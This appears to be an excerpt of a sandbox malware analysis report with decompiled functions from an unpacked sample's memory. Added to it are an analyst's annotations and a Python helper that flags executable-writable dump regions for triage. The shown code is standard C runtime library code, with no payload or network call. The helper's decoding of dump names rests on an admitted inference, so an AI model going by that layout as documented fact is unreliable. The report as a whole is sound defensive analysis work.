                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    
	_t37 = __edx;
	_push(8);
	_push(0x421140);
	E0040E1D8(__ebx, __edi, __esi);
	_t39 = _a4;
	_t50 = _t39;
	_t51 = _t50 != 0;
	if(_t50 != 0) {
		E0040FB29(_t39);
		_v8 = 0;
		*(_t39 + 0xc) = *(_t39 + 0xc) & 0xffffffcf;
		_t16 = E0040FA20(__edx, _t39, _t39);
		__eflags = _t16 - 0xffffffff;
		if(_t16 == 0xffffffff) {
			L6:
			_t17 = 0x4227e0;
		} else {
			_t21 = E0040FA20(__edx, _t39, _t39);
			__eflags = _t21 - 0xfffffffe;
			if(_t21 == 0xfffffffe) {
				goto L6;
			} else {
				_t22 = E0040FA20(__edx, _t39, _t39);
				_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) + *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
			}
		}
		_t9 = _t17 + 4; // 0xa80
		*(_t17 + 4) = *_t9 & 0x000000fd;
		_v8 = 0xfffffffe;
		E0040C735(_t39);
		_t19 = 0;
		__eflags = 0;
	} else {
		_t27 = E0040BFC1(_t51);
		_t40 = 0x16;
		*_t27 = _t40;
		_push(0);
		_push(0);
		_push(0);
		_push(0);
		_push(0);
		E0040E744(__edx, _t40, 0);
		_t19 = _t40;
	}
	return E0040E21D(_t19);
}

Instruction addresses (one per decompiled statement above, in order):
0x0040c73d 0x0040c690 0x0040c692 0x0040c697 0x0040c69e 0x0040c6a3 0x0040c6a8 0x0040c6aa 0x0040c6c8 0x0040c6ce 0x0040c6d1 0x0040c6d6 0x0040c6dc 0x0040c6df 0x0040c70f 0x0040c70f 0x0040c6e1 0x0040c6e2 0x0040c6e8 0x0040c6eb 0x00000000 0x0040c6ed 0x0040c6ee 0x0040c70b 0x0040c70b 0x0040c6eb 0x0040c714 0x0040c71b 0x0040c71e 0x0040c725 0x0040c72a 0x0040c72a 0x0040c6ac 0x0040c6ac 0x0040c6b3 0x0040c6b4 0x0040c6b6 0x0040c6b7 0x0040c6b8 0x0040c6b9 0x0040c6ba 0x0040c6bb 0x0040c6c3 0x0040c6c3 0x0040c731

APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0
• Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
• Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
	signed int _t15;
	LONG* _t21;
	long _t23;
	void* _t31;
	LONG* _t33;
	void* _t34;
	void* _t35;

	_t35 = __eflags;
	_t29 = __edx;
	_t25 = __ebx;
	_push(0xc);
	_push(0x421490);
	E0040E1D8(__ebx, __edi, __esi);
	_t31 = E00410735(__ebx, __edx, __edi, _t35);
	_t15 = *0x422e34; // 0xfffffffe
	if((*(_t31 + 0x70) & _t15) == 0 || *((intOrPtr*)(_t31 + 0x6c)) == 0) {
		E0040D6E0(_t25, 0xd);
		*(_t34 - 4) = *(_t34 - 4) & 0x00000000;
		_t33 = *(_t31 + 0x68);
		*(_t34 - 0x1c) = _t33;
		__eflags = _t33 - *0x422d38; // 0x771638
		if(__eflags != 0) {
			__eflags = _t33;
			if(_t33 != 0) {
				_t23 = InterlockedDecrement(_t33);
				__eflags = _t23;
				if(_t23 == 0) {
					__eflags = _t33 - 0x422910;
					if(__eflags != 0) {
						_push(_t33);
						E0040B6B5(_t25, _t31, _t33, __eflags);
					}
				}
			}
			_t21 = *0x422d38; // 0x771638
			*(_t31 + 0x68) = _t21;
			_t33 = *0x422d38; // 0x771638
			*(_t34 - 0x1c) = _t33;
			InterlockedIncrement(_t33);
		}
		*(_t34 - 4) = 0xfffffffe;
		E00414067();
	} else {
		_t33 = *(_t31 + 0x68);
	}
                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                    					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E0040E21D(_t33);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00771638), ref: 00414050
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                    • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                    			E00413610() {
                                                                                                                                                                                                    				signed long long _v12;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				signed long long _v28;
                                                                                                                                                                                                    				signed char _t8;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					_v20 =  *0x41fb50;
                                                                                                                                                                                                    					_v28 =  *0x41fb48;
                                                                                                                                                                                                    					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                    					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                    					asm("fld1");
                                                                                                                                                                                                    					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                    					asm("fnstsw ax");
                                                                                                                                                                                                    					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						return __eax;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                                                                                    • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                    • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				char _t82;
                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				signed char _t98;
                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t105 = __esi;
                                                                                                                                                                                                    				_t97 = __edx;
                                                                                                                                                                                                    				_t104 = _a4;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t121 = _t104;
                                                                                                                                                                                                    				if(_t104 != 0) {
                                                                                                                                                                                                    					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                    					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                    					_v8 = _t70;
                                                                                                                                                                                                    					if(__eflags < 0) {
                                                                                                                                                                                                    						 *(_t104 + 4) = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                    					_push(_t87);
                                                                                                                                                                                                    					_push(_t70);
                                                                                                                                                                                                    					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                    					__eflags = _t71 - _t87;
                                                                                                                                                                                                    					_v12 = _t71;
                                                                                                                                                                                                    					if(_t71 < _t87) {
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return _t71 | 0xffffffff;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                    						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                    						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                    							_t73 =  *_t104;
                                                                                                                                                                                                    							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                    							_push(_t105);
                                                                                                                                                                                                    							_v16 = _t73 - _t92;
                                                                                                                                                                                                    							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                    							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                    								__eflags = _t98;
                                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                    									__eflags = _v12 - _t87;
                                                                                                                                                                                                    									if(_v12 != _t87) {
                                                                                                                                                                                                    										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                    										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                    											L40:
                                                                                                                                                                                                    											_t75 = _v16 + _v12;
                                                                                                                                                                                                    											__eflags = _t75;
                                                                                                                                                                                                    											L41:
                                                                                                                                                                                                    											return _t75;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                    										__eflags = _t99 - _t87;
                                                                                                                                                                                                    										if(_t99 != _t87) {
                                                                                                                                                                                                    											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                    											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                    											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                    											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												L39:
                                                                                                                                                                                                    												_t66 =  &_v12;
                                                                                                                                                                                                    												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                    												__eflags =  *_t66;
                                                                                                                                                                                                    												goto L40;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_push(2);
                                                                                                                                                                                                    											_push(0);
                                                                                                                                                                                                    											_push(_v8);
                                                                                                                                                                                                    											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(_v12);
                                                                                                                                                                                                    												_push(_v8);
                                                                                                                                                                                                    												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                    												__eflags = _t81;
                                                                                                                                                                                                    												if(_t81 >= 0) {
                                                                                                                                                                                                    													_t82 = 0x200;
                                                                                                                                                                                                    													__eflags = _a4 - 0x200;
                                                                                                                                                                                                    													if(_a4 > 0x200) {
                                                                                                                                                                                                    														L35:
                                                                                                                                                                                                    														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                    														L36:
                                                                                                                                                                                                    														_a4 = _t82;
                                                                                                                                                                                                    														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                    														L37:
                                                                                                                                                                                                    														if(__eflags != 0) {
                                                                                                                                                                                                    															_t63 =  &_a4;
                                                                                                                                                                                                    															 *_t63 = _a4 + 1;
                                                                                                                                                                                                    															__eflags =  *_t63;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L39;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                    													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                    													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                    														goto L35;
                                                                                                                                                                                                    													}
/* Analyst reading, not part of the report: the constants and offsets below match the
   statically linked MSVC CRT. 0x423f60 is indexed as table[fh >> 5] + (fh & 0x1f) * 64,
   which is the __pioinfo lookup; byte +4 of that entry is the osfile flags and 0x80 is
   FTEXT. _t104 is used as a FILE* (_cnt at +4, _base at +8, _flag at +0xc) and both
   loops count '\n' bytes, so this fragment is most likely the tail of _ftell_nolock.
   The function opens earlier in the listing; this fragment starts mid-body. */
                                        __eflags = _t94 & 0x00000400;
                                        if((_t94 & 0x00000400) == 0) {
                                            goto L36;
                                        }
                                        goto L35;
                                    }
                                    L31:
                                    _t75 = _t81 | 0xffffffff; /* return value -1 */
                                    goto L41;
                                }
                                _t84 = *(_t104 + 8); /* FILE._base */
                                _t96 = _a4 + _t84;
                                while(1) {
                                    __eflags = _t84 - _t96;
                                    if(_t84 >= _t96) {
                                        break;
                                    }
                                    __eflags = *_t84 - 0xa; /* 0xa = '\n': text-mode position adjustment */
                                    if(*_t84 == 0xa) {
                                        _t44 = &_a4;
                                        *_t44 = _a4 + 1;
                                        __eflags = *_t44;
                                    }
                                    _t84 = _t84 + 1;
                                    __eflags = _t84;
                                }
                                __eflags = *(_t104 + 0xc) & 0x00002000; /* FILE._flag */
                                goto L37;
                            }
                            _v16 = _t87;
                            goto L40;
                        }
                        _t75 = _v16;
                        goto L41;
                    }
                    _t81 = E0040BFC1(__eflags); /* returns the errno pointer (CRT _errno pattern) */
                    *_t81 = 0x16; /* 0x16 = EINVAL */
                    goto L31;
                }
                _t102 = *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4)); /* __pioinfo[fh >> 5] */
                _t114 = (_v8 & 0x0000001f) << 6; /* (fh & 0x1f) * sizeof(ioinfo), 64 bytes */
                __eflags = *(_t102 + _t114 + 4) & 0x00000080; /* osfile & FTEXT */
                if((*(_t102 + _t114 + 4) & 0x00000080) == 0) {
                    goto L15;
                }
                _t103 = _t92;
                __eflags = _t103 - _t73;
                if(_t103 >= _t73) {
                    goto L15;
                }
                _t115 = _t73;
                do {
                    __eflags = *_t103 - 0xa;
                    if(*_t103 == 0xa) { /* count '\n' bytes in [_t92, _t73) */
                        _v16 = _v16 + 1;
                        _t87 = 0;
                        __eflags = 0;
                    }
                    _t103 = _t103 + 1;
                    __eflags = _t103 - _t115;
                } while (_t103 < _t115);
                goto L15;
            }
            return _t71 - *(_t104 + 4); /* FILE._cnt */
        }
    }
    _t86 = E0040BFC1(_t121); /* errno pointer again */
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    *_t86 = 0x16; /* EINVAL */
    _t71 = E0040E744(__edx, _t104, __esi); /* five zero arguments: the _invalid_parameter(NULL, NULL, NULL, 0, 0) pattern */
    goto L2;
}

Instruction address column for the listing above, detached from the code by extraction: the decompiled lines map to 0x0040c748 through 0x0040c8e0, with 0x00000000 for lines that have no instruction address.
                                                                                                                                                                                                    0x0040c8be
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                    0x0040c86d
                                                                                                                                                                                                    0x0040c873
                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                    0x0040c882
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c877
                                                                                                                                                                                                    0x0040c87a
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                    0x0040c80a
                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                    0x0040c7ce
                                                                                                                                                                                                    0x0040c7d8
                                                                                                                                                                                                    0x0040c7db
                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7e2
                                                                                                                                                                                                    0x0040c7e4
                                                                                                                                                                                                    0x0040c7e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7e8
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x0040c7ed
                                                                                                                                                                                                    0x0040c7ef
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                    0x0040c7f4
                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040c7ab
                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                    0x0040c75b
                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                    0x0040c761
                                                                                                                                                                                                    0x0040c762
                                                                                                                                                                                                    0x0040c763
                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                    0x0040c765
                                                                                                                                                                                                    0x0040c76b
                                                                                                                                                                                                    0x00000000

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
Uniqueness

Uniqueness Score: -1.00%
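The three memory dumps listed under Memory Dump Source share one naming scheme, and the interesting fact is buried in its hex fields: every region is an image-backed mapping whose protection is 0x40 (PAGE_EXECUTE_READWRITE), which is what a packer leaves behind after it loosens section rights to write the unpacked code in place. The helper below is an added example for triage, not part of this report or of Joe Sandbox's own tooling. The field layout is inferred from the names on this page and cross-checked against the snapshot name hcaresult_10_2_400000_caQi43qE17.jbxd (first field = PID 0xA = 10, second = snapshot index 2, fourth = base 0x400000); the protection and type fields decode as the Win32 PAGE_* and MEM_* constants. The third, sixth and eighth fields are not documented here and are kept raw rather than guessed.

```python
"""Decode Joe Sandbox .sdmp dump names and flag writable+executable image regions.

Added triage example; field layout inferred from the dump names in this report,
not from Joe Sandbox documentation. Fields whose meaning is not established are
kept raw.
"""
from dataclasses import dataclass
import re

# Win32 memory protection and region type constants (winnt.h).
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# <pid>.<snapshot>.<raw>.<base>.<protect>.<raw>.<type>.<raw>.sdmp  (layout inferred, see above)
_SDMP = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    snapshot: int
    field3: str      # meaning not established; kept raw
    base: int
    protect: int
    field6: str      # meaning not established; kept raw
    mem_type: int
    field8: str      # meaning not established; kept raw

    def protection(self) -> str:
        base = PAGE_FLAGS.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [name for bit, name in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_writable_executable(self) -> bool:
        p = self.protect & 0xFF
        return p in EXECUTABLE and p in WRITABLE


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse a dump file name (path components are ignored)."""
    m = _SDMP.match(name.rsplit("/", 1)[-1])
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    f = m.groups()
    return DumpRegion(int(f[0], 16), int(f[1], 16), f[2], int(f[3], 16),
                      int(f[4], 16), f[5], int(f[6], 16), f[7])


def matches_snapshot(region: DumpRegion, snapshot_file: str) -> bool:
    """Cross-check pid, snapshot index and base against hcaresult_<pid>_<snap>_<base>_*.jbxd."""
    m = re.match(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_", snapshot_file)
    if not m:
        return False
    return (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (
        region.pid, region.snapshot, region.base)


def triage(names):
    """Return (name, verdict) pairs. An image-backed region that is both writable and
    executable is the footprint of section rights having been changed at run time."""
    out = []
    for n in names:
        r = parse_sdmp_name(n)
        rwx_image = r.is_writable_executable() and r.mem_type == 0x1000000
        verdict = f"pid={r.pid} base=0x{r.base:x} {r.protection()} {r.type_name()}"
        if rwx_image:
            verdict += " <- RWX image region"
        out.append((n, verdict))
    return out


# Dump names taken from this report's Memory Dump Source block.
REPORT_DUMPS = [
    "0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp",
    "0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmp",
    "0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmp",
]

if __name__ == "__main__":
    for name, verdict in triage(REPORT_DUMPS):
        print(name, "->", verdict)
```

Run against the three names above, every region decodes to PAGE_EXECUTE_READWRITE on a MEM_IMAGE mapping, and only the 0x400000 dump matches the snapshot file, which is why that one carries the PE header ("based on PE: true") while the others are associated section dumps of the same module.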

C-Code - Quality: 97%
			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
                                                                                                                                                                                                    											__eflags = _t30;
